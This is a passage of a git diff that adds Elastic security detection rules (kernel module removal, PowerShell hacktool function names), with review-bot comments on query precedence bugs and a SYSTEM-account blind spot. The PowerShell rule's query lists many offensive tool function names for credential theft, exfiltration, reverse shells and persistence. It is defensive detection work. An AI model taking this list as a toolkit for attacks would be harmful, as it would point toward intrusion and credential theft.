\ No newline at end of file 
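Review bot: The EQL `query` in cd66a5af-e34b-4bb0-8931-57d0a043f2ef_108.json mixes `and` and `or` without parentheses around the process-name alternative; because `and` binds tighter than `or` in EQL, the `host.os.type`, `event.action` and `event.type` filters apply only to the `rmmod` branch, while the `process.parent.name` shell filter applies only to the `modprobe` branch. As written, `rmmod` alerts from any parent process and the `modprobe -r` branch matches every process event type (not just `start`), which inflates alert volume and weakens the parent-shell heuristic the rule relies on. Grouping the alternative fixes both: change `process.name == "rmmod" or (process.name == "modprobe" and process.args in ("--remove", "-r")) and` to `(process.name == "rmmod" or (process.name == "modprobe" and process.args in ("--remove", "-r"))) and` (with the JSON escaping kept as in the file). The `_109` revision of this rule added later in the same commit, whose hunk continues past this chunk, carries the same ungrouped expression.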
diff --git a/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_109.json b/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_109.json new file mode 100644 index 00000000000..00ddd19282c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_109.json 
@@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.", + "false_positives": [ + "There is usually no reason to remove modules, but some buggy modules require it. These can be exempted by username. Note that some Linux distributions are not built to support the removal of modules at all." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Kernel Module Removal", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and\nprocess.name == \"rmmod\" or (process.name == \"modprobe\" and process.args in (\"--remove\", \"-r\")) and \nprocess.parent.name in (\"sudo\", \"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n", + "references": [ + "http://man7.org/linux/man-pages/man8/modprobe.8.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "cd66a5af-e34b-4bb0-8931-57d0a043f2ef", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "cd66a5af-e34b-4bb0-8931-57d0a043f2ef_109", + "type": "security-rule" +} \ No newline at end of file 
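Review bot: The EQL in the `query` field mixes `and` and `or` with no parentheses around the two process alternatives, and since EQL binds `and` tighter than `or`, the expression groups as `(linux and start and exec and process.name == "rmmod") or (modprobe -r and process.parent.name in (...))`. The `rmmod` branch therefore never applies the interactive-shell parent filter, while the `modprobe --remove` branch is not restricted to `host.os.type == "linux"`, `event.type == "start"` or the `exec`/`exec_event` actions, so it can match on any process event from any OS that carries those args. Wrap the alternatives so both share the guards: `(process.name == "rmmod" or (process.name == "modprobe" and process.args in ("--remove", "-r"))) and process.parent.name in (...)`. Separately, `index` includes `endgame-*` and `event.action` accepts `exec_event`, but `related_integrations` lists only the `endpoint` package; if Endgame is a supported source it should be declared there too.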
diff --git a/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_10.json b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_10.json
new file mode 100644
index 00000000000..1677a72f8be
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_10.json
@@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects known PowerShell offensive tooling functions names in PowerShell scripts. Attackers commonly use out-of-the-box offensive tools without modifying the code. This rule aim is to take advantage of that.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential PowerShell HackTool Script by Function Names", + "note": "## Triage and analysis\n\n### Investigating Potential PowerShell HackTool Script by Function Names\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAdversaries often exploit PowerShell's capabilities to execute malicious scripts and perform various attacks. This rule identifies known offensive tooling function names in PowerShell scripts, as attackers commonly use out-of-the-box tools without modifying the code. By monitoring these specific function names, the rule aims to detect and alert potential malicious PowerShell activity.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the script's execution context, such as the user account, privileges, the role of the system on which it was executed, and any relevant timestamps.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate the origin of the PowerShell script, including its source, download method, and any associated URLs or IP addresses.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process's `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - 
!{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This rule may generate false positives if legitimate scripts or tools used by administrators contain any of the listed function names. These function names are commonly associated with offensive tooling, but they may also be present in benign scripts or tools.\n- To handle these false positives consider adding exceptions - preferably with a combination of full file path and users.\n\n### Related Rules\n\n- PowerShell Invoke-NinjaCopy script - b8386923-b02c-4b94-986a-d223d9b01f88\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - If malicious activity is confirmed, perform a broader investigation to identify the scope of the compromise and determine the appropriate remediation steps.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, 
search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"Add-DomainGroupMember\" or \"Add-DomainObjectAcl\" or\n \"Add-RemoteConnection\" or \"Add-ServiceDacl\" or\n \"Add-Win32Type\" or \"Convert-ADName\" or\n \"Convert-LDAPProperty\" or \"ConvertFrom-LDAPLogonHours\" or\n \"ConvertFrom-UACValue\" or \"Copy-ArrayOfMemAddresses\" or\n \"Create-NamedPipe\" or \"Create-ProcessWithToken\" or\n \"Create-RemoteThread\" or \"Create-SuspendedWinLogon\" or\n \"Create-WinLogonProcess\" or \"Emit-CallThreadStub\" or\n \"Enable-SeAssignPrimaryTokenPrivilege\" or 
\"Enable-SeDebugPrivilege\" or\n \"Enum-AllTokens\" or \"Export-PowerViewCSV\" or\n \"Find-AVSignature\" or \"Find-AppLockerLog\" or\n \"Find-DomainLocalGroupMember\" or \"Find-DomainObjectPropertyOutlier\" or\n \"Find-DomainProcess\" or \"Find-DomainShare\" or\n \"Find-DomainUserEvent\" or \"Find-DomainUserLocation\" or\n \"Find-InterestingDomainAcl\" or \"Find-InterestingDomainShareFile\" or\n \"Find-InterestingFile\" or \"Find-LocalAdminAccess\" or\n \"Find-PSScriptsInPSAppLog\" or \"Find-PathDLLHijack\" or\n \"Find-ProcessDLLHijack\" or \"Find-RDPClientConnection\" or\n \"Get-AllAttributesForClass\" or \"Get-CachedGPPPassword\" or\n \"Get-DecryptedCpassword\" or \"Get-DecryptedSitelistPassword\" or\n \"Get-DelegateType\" or\n \"Get-DomainDFSShare\" or \"Get-DomainDFSShareV1\" or\n \"Get-DomainDFSShareV2\" or \"Get-DomainDNSRecord\" or\n \"Get-DomainDNSZone\" or \"Get-DomainFileServer\" or\n \"Get-DomainForeignGroupMember\" or \"Get-DomainForeignUser\" or\n \"Get-DomainGPO\" or \"Get-DomainGPOComputerLocalGroupMapping\" or\n \"Get-DomainGPOLocalGroup\" or \"Get-DomainGPOUserLocalGroupMapping\" or\n \"Get-DomainGUIDMap\" or \"Get-DomainGroup\" or\n \"Get-DomainGroupMember\" or \"Get-DomainGroupMemberDeleted\" or\n \"Get-DomainManagedSecurityGroup\" or \"Get-DomainOU\" or\n \"Get-DomainObject\" or \"Get-DomainObjectAcl\" or\n \"Get-DomainObjectAttributeHistory\" or \"Get-DomainObjectLinkedAttributeHistory\" or\n \"Get-DomainPolicyData\" or \"Get-DomainSID\" or\n \"Get-DomainSPNTicket\" or \"Get-DomainSearcher\" or\n \"Get-DomainSite\" or \"Get-DomainSubnet\" or\n \"Get-DomainTrust\" or \"Get-DomainTrustMapping\" or\n \"Get-DomainUser\" or \"Get-DomainUserEvent\" or\n \"Get-Forest\" or \"Get-ForestDomain\" or\n \"Get-ForestGlobalCatalog\" or \"Get-ForestSchemaClass\" or\n \"Get-ForestTrust\" or \"Get-GPODelegation\" or\n \"Get-GPPAutologon\" or \"Get-GPPInnerField\" or\n \"Get-GPPInnerFields\" or \"Get-GPPPassword\" or\n \"Get-GptTmpl\" or \"Get-GroupsXML\" or\n 
\"Get-HttpStatus\" or \"Get-ImageNtHeaders\" or\n \"Get-Keystrokes\" or\n \"Get-MemoryProcAddress\" or \"Get-MicrophoneAudio\" or\n \"Get-ModifiablePath\" or \"Get-ModifiableRegistryAutoRun\" or\n \"Get-ModifiableScheduledTaskFile\" or \"Get-ModifiableService\" or\n \"Get-ModifiableServiceFile\" or \"Get-Name\" or\n \"Get-NetComputerSiteName\" or \"Get-NetLocalGroup\" or\n \"Get-NetLocalGroupMember\" or \"Get-NetLoggedon\" or\n \"Get-NetRDPSession\" or \"Get-NetSession\" or\n \"Get-NetShare\" or \"Get-PEArchitecture\" or\n \"Get-PEBasicInfo\" or \"Get-PEDetailedInfo\" or\n \"Get-PathAcl\" or \"Get-PrimaryToken\" or\n \"Get-ProcAddress\" or \"Get-ProcessTokenGroup\" or\n \"Get-ProcessTokenPrivilege\" or \"Get-ProcessTokenType\" or\n \"Get-RegLoggedOn\" or \"Get-RegistryAlwaysInstallElevated\" or\n \"Get-RegistryAutoLogon\" or \"Get-RemoteProcAddress\" or\n \"Get-Screenshot\" or \"Get-ServiceDetail\" or\n \"Get-SiteListPassword\" or \"Get-SitelistField\" or\n \"Get-System\" or \"Get-SystemNamedPipe\" or\n \"Get-SystemToken\" or \"Get-ThreadToken\" or\n \"Get-TimedScreenshot\" or \"Get-TokenInformation\" or\n \"Get-TopPort\" or \"Get-UnattendedInstallFile\" or\n \"Get-UniqueTokens\" or \"Get-UnquotedService\" or\n \"Get-VaultCredential\" or \"Get-VaultElementValue\" or\n \"Get-VirtualProtectValue\" or \"Get-VolumeShadowCopy\" or\n \"Get-WMIProcess\" or \"Get-WMIRegCachedRDPConnection\" or\n \"Get-WMIRegLastLoggedOn\" or \"Get-WMIRegMountedDrive\" or\n \"Get-WMIRegProxy\" or \"Get-WebConfig\" or\n \"Get-Win32Constants\" or \"Get-Win32Functions\" or\n \"Get-Win32Types\" or \"Import-DllImports\" or\n \"Import-DllInRemoteProcess\" or \"Inject-LocalShellcode\" or\n \"Inject-RemoteShellcode\" or \"Install-ServiceBinary\" or\n \"Invoke-CompareAttributesForClass\" or \"Invoke-CreateRemoteThread\" or\n \"Invoke-CredentialInjection\" or \"Invoke-DllInjection\" or\n \"Invoke-EventVwrBypass\" or \"Invoke-ImpersonateUser\" or\n \"Invoke-Kerberoast\" or \"Invoke-MemoryFreeLibrary\" 
or\n \"Invoke-MemoryLoadLibrary\" or\n \"Invoke-Mimikatz\" or \"Invoke-NinjaCopy\" or\n \"Invoke-PatchDll\" or \"Invoke-Portscan\" or\n \"Invoke-PrivescAudit\" or \"Invoke-ReflectivePEInjection\" or\n \"Invoke-ReverseDnsLookup\" or \"Invoke-RevertToSelf\" or\n \"Invoke-ServiceAbuse\" or \"Invoke-Shellcode\" or\n \"Invoke-TokenManipulation\" or \"Invoke-UserImpersonation\" or\n \"Invoke-WmiCommand\" or \"Mount-VolumeShadowCopy\" or\n \"New-ADObjectAccessControlEntry\" or \"New-DomainGroup\" or\n \"New-DomainUser\" or \"New-DynamicParameter\" or\n \"New-InMemoryModule\" or\n \"New-ThreadedFunction\" or \"New-VolumeShadowCopy\" or\n \"Out-CompressedDll\" or \"Out-EncodedCommand\" or\n \"Out-EncryptedScript\" or \"Out-Minidump\" or\n \"PortScan-Alive\" or \"Portscan-Port\" or\n \"Remove-DomainGroupMember\" or \"Remove-DomainObjectAcl\" or\n \"Remove-RemoteConnection\" or \"Remove-VolumeShadowCopy\" or\n \"Restore-ServiceBinary\" or \"Set-DesktopACLToAllowEveryone\" or\n \"Set-DesktopACLs\" or \"Set-DomainObject\" or\n \"Set-DomainObjectOwner\" or \"Set-DomainUserPassword\" or\n \"Set-ServiceBinaryPath\" or \"Sub-SignedIntAsUnsigned\" or\n \"Test-AdminAccess\" or \"Test-MemoryRangeValid\" or\n \"Test-ServiceDaclPermission\" or \"Update-ExeFunctions\" or\n \"Update-MemoryAddresses\" or \"Update-MemoryProtectionFlags\" or\n \"Write-BytesToMemory\" or \"Write-HijackDll\" or\n \"Write-PortscanOut\" or \"Write-ServiceBinary\" or\n \"Write-UserAddMSI\" or \"Invoke-Privesc\" or\n \"func_get_proc_address\" or \"Invoke-BloodHound\" or\n \"Invoke-HostEnum\" or \"Get-BrowserInformation\" or\n \"Get-DomainAccountPolicy\" or \"Get-DomainAdmins\" or\n \"Get-AVProcesses\" or \"Get-AVInfo\" or\n \"Get-RecycleBin\" or \"Invoke-BruteForce\" or\n \"Get-PassHints\" or \"Invoke-SessionGopher\" or\n \"Get-LSASecret\" or \"Get-PassHashes\" or\n \"Invoke-WdigestDowngrade\" or \"Get-ChromeDump\" or\n \"Invoke-DomainPasswordSpray\" or \"Get-FoxDump\" or\n \"New-HoneyHash\" or \"Invoke-DCSync\" 
or\n \"Invoke-PowerDump\" or \"Invoke-SSIDExfil\" or\n \"Invoke-PowerShellTCP\" or \"Add-Exfiltration\" or\n \"Do-Exfiltration\" or \"Invoke-DropboxUpload\" or\n \"Invoke-ExfilDataToGitHub\" or \"Invoke-EgressCheck\" or\n \"Invoke-PostExfil\" or \"Create-MultipleSessions\" or\n \"Invoke-NetworkRelay\" or \"New-GPOImmediateTask\" or\n \"Invoke-WMIDebugger\" or \"Invoke-SQLOSCMD\" or\n \"Invoke-SMBExec\" or \"Invoke-PSRemoting\" or\n \"Invoke-ExecuteMSBuild\" or \"Invoke-DCOM\" or\n \"Invoke-InveighRelay\" or \"Invoke-PsExec\" or\n \"Invoke-SSHCommand\" or \"Find-ActiveUsersWMI\" or\n \"Get-SystemDrivesWMI\" or \"Get-ActiveNICSWMI\" or\n \"Remove-Persistence\" or \"DNS_TXT_Pwnage\" or\n \"Execute-OnTime\" or \"HTTP-Backdoor\" or\n \"Add-ConstrainedDelegationBackdoor\" or \"Add-RegBackdoor\" or\n \"Add-ScrnSaveBackdoor\" or \"Gupt-Backdoor\" or\n \"Invoke-ADSBackdoor\" or \"Add-Persistence\" or\n \"Invoke-ResolverBackdoor\" or \"Invoke-EventLogBackdoor\" or\n \"Invoke-DeadUserBackdoor\" or \"Invoke-DisableMachineAcctChange\" or\n \"Invoke-AccessBinary\" or \"Add-NetUser\" or\n \"Invoke-Schtasks\" or \"Invoke-JSRatRegsvr\" or\n \"Invoke-JSRatRundll\" or \"Invoke-PoshRatHttps\" or\n \"Invoke-PsGcatAgent\" or \"Remove-PoshRat\" or\n \"Install-SSP\" or \"Invoke-BackdoorLNK\" or\n \"PowerBreach\" or \"InstallEXE-Persistence\" or\n \"RemoveEXE-Persistence\" or \"Install-ServiceLevel-Persistence\" or\n \"Remove-ServiceLevel-Persistence\" or \"Invoke-Prompt\" or\n \"Invoke-PacketCapture\" or \"Start-WebcamRecorder\" or\n \"Get-USBKeyStrokes\" or \"Invoke-KeeThief\" or\n \"Get-Keystrokes\" or \"Invoke-NetRipper\" or\n \"Get-EmailItems\" or \"Invoke-MailSearch\" or\n \"Invoke-SearchGAL\" or \"Get-WebCredentials\" or\n \"Start-CaptureServer\" or \"Invoke-PowerShellIcmp\" or\n \"Invoke-PowerShellTcpOneLine\" or \"Invoke-PowerShellTcpOneLineBind\" or\n \"Invoke-PowerShellUdp\" or \"Invoke-PowerShellUdpOneLine\" or\n \"Run-EXEonRemote\" or \"Download-Execute-PS\" or\n 
\"Out-RundllCommand\" or \"Set-RemoteWMI\" or\n \"Set-DCShadowPermissions\" or \"Invoke-PowerShellWMI\" or\n \"Invoke-Vnc\" or \"Invoke-LockWorkStation\" or\n \"Invoke-EternalBlue\" or \"Invoke-ShellcodeMSIL\" or\n \"Invoke-MetasploitPayload\" or \"Invoke-DowngradeAccount\" or\n \"Invoke-RunAs\" or \"ExetoText\" or\n \"Disable-SecuritySettings\" or \"Set-MacAttribute\" or\n \"Invoke-MS16032\" or \"Invoke-BypassUACTokenManipulation\" or\n \"Invoke-SDCLTBypass\" or \"Invoke-FodHelperBypass\" or\n \"Invoke-EventVwrBypass\" or \"Invoke-EnvBypass\" or\n \"Get-ServiceUnquoted\" or \"Get-ServiceFilePermission\" or\n \"Get-ServicePermission\" or\n \"Enable-DuplicateToken\" or \"Invoke-PsUaCme\" or\n \"Invoke-Tater\" or \"Invoke-WScriptBypassUAC\" or\n \"Invoke-AllChecks\" or \"Find-TrustedDocuments\" or\n \"Invoke-Interceptor\" or \"Invoke-PoshRatHttp\" or\n \"Invoke-ExecCommandWMI\" or \"Invoke-KillProcessWMI\" or\n \"Invoke-CreateShareandExecute\" or \"Invoke-RemoteScriptWithOutput\" or\n \"Invoke-SchedJobManipulation\" or \"Invoke-ServiceManipulation\" or\n \"Invoke-PowerOptionsWMI\" or \"Invoke-DirectoryListing\" or\n \"Invoke-FileTransferOverWMI\" or \"Invoke-WMImplant\" or\n \"Invoke-WMIObfuscatedPSCommand\" or \"Invoke-WMIDuplicateClass\" or\n \"Invoke-WMIUpload\" or \"Invoke-WMIRemoteExtract\" or \"Invoke-winPEAS\"\n ) and\n not powershell.file.script_block_text : (\n \"sentinelbreakpoints\" and \"Set-PSBreakpoint\"\n ) and\n not file.path : (\n ?\\:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows?Defender?Advanced?Threat?Protection\\\\\\\\DataCollection\\\\\\\\*\n ) and\n not user.id : (\"S-1-5-18\" or \"S-1-5-19\")\n", + "references": [ + "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md", + "https://github.com/BC-SECURITY/Empire" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", 
+ "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "cde1bafa-9f01-4f43-a872-605b678968b0", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 10 + }, + "id": "cde1bafa-9f01-4f43-a872-605b678968b0_10", + "type": "security-rule" +} \ No newline at end of file 
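Review bot: The trailing `not user.id : ("S-1-5-18" or "S-1-5-19")` clause in `query` suppresses every script block that ran as SYSTEM or LOCAL SERVICE, so the very function names this rule exists to catch (`Invoke-Mimikatz`, `Invoke-TokenManipulation`, `Get-LSASecret`, `Invoke-DCSync`) raise nothing once an attacker has reached that context — a context several of the listed tools (`Invoke-PsExec`, `Invoke-SMBExec`, `Invoke-ServiceAbuse`) are used to obtain. The preceding `file.path` clause already carves out the Defender ATP `DataCollection` directory, which looks like the benign SYSTEM source this was meant for, so I would drop the SID exclusion, or at minimum record it under `false_positives` as a deliberate blind spot so tuning teams do not rely on this rule for SYSTEM-level activity. Two smaller points in the same hunk: `"Get-Keystrokes"` and `"Invoke-EventVwrBypass"` each appear twice in the term list, and the investigation step "searching for login events (for example, 4624) to the target host after the registry modification" is carried over from a registry rule and should read "after the script execution".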
diff --git a/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_111.json b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_111.json
new file mode 100644
index 00000000000..4f812c3ab4c
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_111.json
@@ -0,0 +1,105 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects known PowerShell offensive tooling functions names in PowerShell scripts. Attackers commonly use out-of-the-box offensive tools without modifying the code. This rule aim is to take advantage of that.", + "filters": [ + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\DataCollection\\\\*" + } + } + } + } + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential PowerShell HackTool Script by Function Names", + "note": "## Triage and analysis\n\n### Investigating Potential PowerShell HackTool Script by Function Names\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAdversaries often exploit PowerShell's capabilities to execute malicious scripts and perform various attacks. This rule identifies known offensive tooling function names in PowerShell scripts, as attackers commonly use out-of-the-box tools without modifying the code. By monitoring these specific function names, the rule aims to detect and alert potential malicious PowerShell activity.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the script's execution context, such as the user account, privileges, the role of the system on which it was executed, and any relevant timestamps.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate the origin of the PowerShell script, including its source, download method, and any associated URLs or IP addresses.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process's `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous 